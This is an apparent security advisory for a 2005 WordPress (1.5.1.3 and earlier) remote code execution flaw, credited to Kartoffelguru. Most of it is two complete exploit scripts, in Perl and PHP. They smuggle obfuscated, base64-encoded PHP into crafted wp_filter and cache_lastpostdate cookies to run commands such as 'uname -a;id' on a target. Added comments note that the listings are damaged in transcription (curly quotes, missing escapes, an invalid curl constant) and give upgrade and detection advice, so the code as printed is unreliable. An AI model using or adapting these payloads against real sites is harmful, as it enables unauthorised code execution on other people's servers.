WordPress Command Execution Vulnerability (Cache_lastpostdate)
Summary
Credit:
The information has been provided by Kartoffelguru.
Details
Vulnerable Systems:
* WordPress version 1.5.1.3 and prior (with register_globals enabled)
Immune Systems:
* WordPress version 1.5.1.4 or newer
Perl Exploit:
#!/usr/bin/perl
# Proof-of-concept listing accompanying the advisory above (WordPress <= 1.5.1.3,
# "cache_lastpostdate"). As transcribed here the script is NOT runnable: every
# string delimiter is a curly quote, the backslashes of the "\n"/"\r" escapes
# and of the URL regex have been lost, and `use warnings` is absent.
#
# What the code below visibly does: it base64-encodes a PHP snippet, rebuilds
# that text as a chain of PHP chr() calls, wraps it in a second base64 layer,
# and sends the result in a Cookie header whose keys are named after WordPress
# internals ($wp_filter, $cache_lastpostdate, $cache_lastpostmodified). The
# advisory states that register_globals must be on, i.e. the cookie keys are
# expected to populate PHP's global scope; the WordPress-side handling itself
# is not shown on this page.
#
# Defensive notes: the fix is to run 1.5.1.4 or newer (per the advisory) and
# to keep register_globals off. Cookies named wp_filter[...],
# cache_lastpostdate[...] or cache_lastpostmodified[...] are internal variable
# names rather than cookies the application normally sets, so their presence
# in a request is a reasonable detection signature — confirm against the
# application's own cookie set before alerting on it.
use strict;
use MIME::Base64 qw(encode_base64 decode_base64);
use IO::Socket;
# Banner. The trailing "n" in each literal is presumably "\n" lost in transcription.
print ‘WordPress <= 1.5.1.3 – remote code execution 0-DDAAYY exploit (Converted by Noam)n’;
print ‘(C) Copyright 2005 Kartoffelgurunn’;
print ‘[!] info: requires register_globals turned on on target hostnn’;
# Both positional arguments (blog URL, PHP code) are required; otherwise print usage and exit.
if (@ARGV < 2)
{
die (‘usage:nt./wpx.php http://www.xyz.net/blog/ ‘system(‘uname -a;id’);’nn’);
}
# Argument 1: base URL of the blog.  Argument 2: PHP statement(s) to send.
my $url = shift;
my $cmd = shift;
# Empty code argument falls back to phpinfo().
if (length($cmd)==0)
{
$cmd = ‘phpinfo();’;
}
#print ‘code: ‘.encode_base64($cmd, ”).’n’;
# First base64 layer over $cmd, split into its byte values (the second
# encode_base64 argument is the empty string, i.e. no line breaks).
my @code = unpack(‘C*’, encode_base64($cmd, ”));
#print ‘code: @coden’;
# Re-express the base64 text as PHP source: one "chr(N)." per byte, closed by
# chr(32) (a space) so the concatenation chain is syntactically complete.
my $cnv = ”;
for (my $i=0;$i<@code; $i++)
{
$cnv.= ‘chr(‘.$code[$i].’).’;
}
$cnv.=’chr(32)’;
#print ‘cnv: $cnvn’;
# Second base64 layer: a query-string-shaped wrapper ("args[0]=...&args[1]=x")
# around the chr() chain.  This is the value placed in the cookie below.
my $str = encode_base64(‘args[0]=eval(base64_decode(‘.$cnv.’)).die()&args[1]=x’, ”);
#print ‘str: [$str]n’;
# Cookie assembly.  Keys mimic WordPress's $wp_filter hook table (a list of
# function names with accepted_args counts) and the cache_* globals.  With
# register_globals on these become PHP variables — the advisory's stated
# prerequisite.  The value "//e" for cache_lastpostmodified[server] looks like a
# PCRE pattern carrying the /e (eval) modifier, which is presumably the step that
# turns string data into executed code; the server-side path is not visible here.
my $cookie=’wp_filter[query_vars][0][0][function]=get_lastpostdate;’. ‘wp_filter[query_vars][0][0][accepted_args]=0;’;
$cookie.=’wp_filter[query_vars][0][1][function]=base64_decode;’. ‘wp_filter[query_vars][0][1][accepted_args]=1;’;
$cookie.=’cache_lastpostmodified[server]=//e;cache_lastpostdate[server]=’;
$cookie.=$str;
$cookie.=’;wp_filter[query_vars][1][0][function]=parse_str;’. ‘wp_filter[query_vars][1][0][accepted_args]=1;’;
$cookie.=’wp_filter[query_vars][2][0][function]=get_lastpostmodified;’ . ‘wp_filter[query_vars][2][0][accepted_args]=0;’;
$cookie.=’wp_filter[query_vars][3][0][function]=preg_replace;’ . ‘wp_filter[query_vars][3][0][accepted_args]=3;’;
# Split the URL into host and path.  As printed the slashes inside the m//
# pattern are unescaped, which cannot parse — they were presumably backslash-
# escaped originally.  The match result is never checked, so $1/$2 may be
# undefined (or stale) if the URL does not fit the pattern.
$url =~ /http://([^/]+)/(.*?)/;
my $hostname = $1;
my $path = $2;
# Hand-built HTTP/1.1 request.  The trailing "r" on each header line is
# presumably "\r" lost in transcription.  The host name doubles as Referer.
my $Request = ‘GET /$path HTTP/1.1r
Host: $hostnamer
Cookie: $cookier
Referer: $hostnamer
Connection: closer
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)r
r
‘;
# Plain TCP to port 80: no TLS, and a port given in the URL is ignored.
my $socket = IO::Socket::INET->new ( Proto => ‘tcp’, PeerAddr => $hostname, PeerPort => 80);
unless ($socket) { die ‘cannot connect to http daemon on $hostname’ }
# Echo the request for debugging, send it, then stream the raw response to stdout.
print ‘Request: [$Request]n’;
print $socket $Request;
while (<$socket>)
{
print $_;
}
PHP Exploit:
<?php
// PHP variant of the proof-of-concept above: identical payload construction,
// but the request is sent through the curl extension instead of a raw socket.
// As transcribed the listing is NOT runnable: string delimiters are curly
// quotes, the "\n" escapes have lost their backslashes, and the slashes inside
// the http:// regex are unescaped.  See the Perl listing for the defensive
// notes (upgrade per the advisory, keep register_globals off, treat cookies
// named wp_filter[...] / cache_lastpost*[...] as a detection signature).
echo ‘WordPress <= 1.5.1.3 – remote code execution 0-DDAAYY exploitn’;
echo ‘(C) Copyright 2005 Kartoffelgurunn’;
echo ‘[!] info: requires register_globals turned on on target hostnn’;
// Hard requirement on the curl extension; nothing else is attempted without it.
if (!extension_loaded(‘curl’)) {
die (‘[-] you need the curl extension activated…n’);
}
// Print the usage text and terminate (die never returns).
function usage()
{
die (‘usage:nt./wpx.php -h http://www.xyz.net/blog/ -c ‘system(‘uname -a;id’);’nn’);
}
// -h <url> is mandatory; -c <php code> is optional (defaulted below).
$options = getopt(‘h:c:’);
if (count($options) < 1 || !isset($options[‘h’])) {
usage();
}
// getopt() yields an array when an option is repeated; keep only the first value.
$host = (is_array($options[‘h’]) ? $options[‘h’][0]:$options[‘h’]);
$cmd = (is_array($options[‘c’]) ? $options[‘c’][0]:$options[‘c’]);
// Only plain http:// targets are accepted (the pattern as printed is missing
// its escapes and would not compile).
if (!preg_match(‘/^http:///’, $host, $dummy)) {
usage();
}
// Empty or whitespace-only code falls back to phpinfo().
if (strlen(trim($cmd))==0) {
$cmd = ‘phpinfo();’;
}
// First base64 layer over the code, echoed for debugging.
$code = base64_encode($cmd);
echo ‘code: $coden’;
// Re-express the base64 text as PHP source: "chr(N)." per byte, closed by chr(32).
$cnv = ”;
for ($i=0;$i<strlen($code); $i++) {
$cnv.= ‘chr(‘.ord($code[$i]).’).’;
}
$cnv.=’chr(32)’;
echo ‘cnv: $cnvn’;
// Second base64 layer: query-string-shaped wrapper around the chr() chain.
$str = base64_encode(‘args[0]=eval(base64_decode(‘.$cnv.’)).die()&args[1]=x’);
// Cookie assembly, byte-for-byte the same layout as the Perl version: keys shaped
// like WordPress's $wp_filter hook table plus the cache_* globals, relying on
// register_globals to turn them into PHP variables.  "//e" for
// cache_lastpostmodified[server] looks like a PCRE pattern with the /e modifier;
// the server-side code path is not shown on this page.
$cookie=’wp_filter[query_vars][0][0][function]=get_lastpostdate;’ . ‘wp_filter[query_vars][0][0][accepted_args]=0;’;
$cookie.=’wp_filter[query_vars][0][1][function]=base64_decode;’ . ‘wp_filter[query_vars][0][1][accepted_args]=1;’;
$cookie.=’cache_lastpostmodified[server]=//e;cache_lastpostdate[server]=’;
$cookie.=$str;
$cookie.=’;wp_filter[query_vars][1][0][function]=parse_str;’ . ‘wp_filter[query_vars][1][0][accepted_args]=1;’;
$cookie.=’wp_filter[query_vars][2][0][function]=get_lastpostmodified;’ . ‘wp_filter[query_vars][2][0][accepted_args]=0;’;
$cookie.=’wp_filter[query_vars][3][0][function]=preg_replace;’ . ‘wp_filter[query_vars][3][0][accepted_args]=3;’;
// Plain GET over curl, HTTP/1.0 forced, headers suppressed, body returned as a
// string.  NOTE(review): CURLOPT_CURLOPT_REFERER is not a defined constant as
// written (looks like a typo/transcription error); PHP would emit a notice and
// pass the bareword as a string, so this option would not take effect.
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $host);
curl_setopt($ch, CURLOPT_POST, 0);
curl_setopt($ch, CURLOPT_COOKIE, $cookie);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_CURLOPT_REFERER, $host);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_USERAGENT, ‘Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)’);
curl_setopt($ch, CURLOPT_HTTP_VERSION, CURL_HTTP_VERSION_1_0);
// Send the request and print whatever the server returned.
echo ‘[+] now executingnn’;
$r = curl_exec($ch);
curl_close($ch);
echo $r;
?>’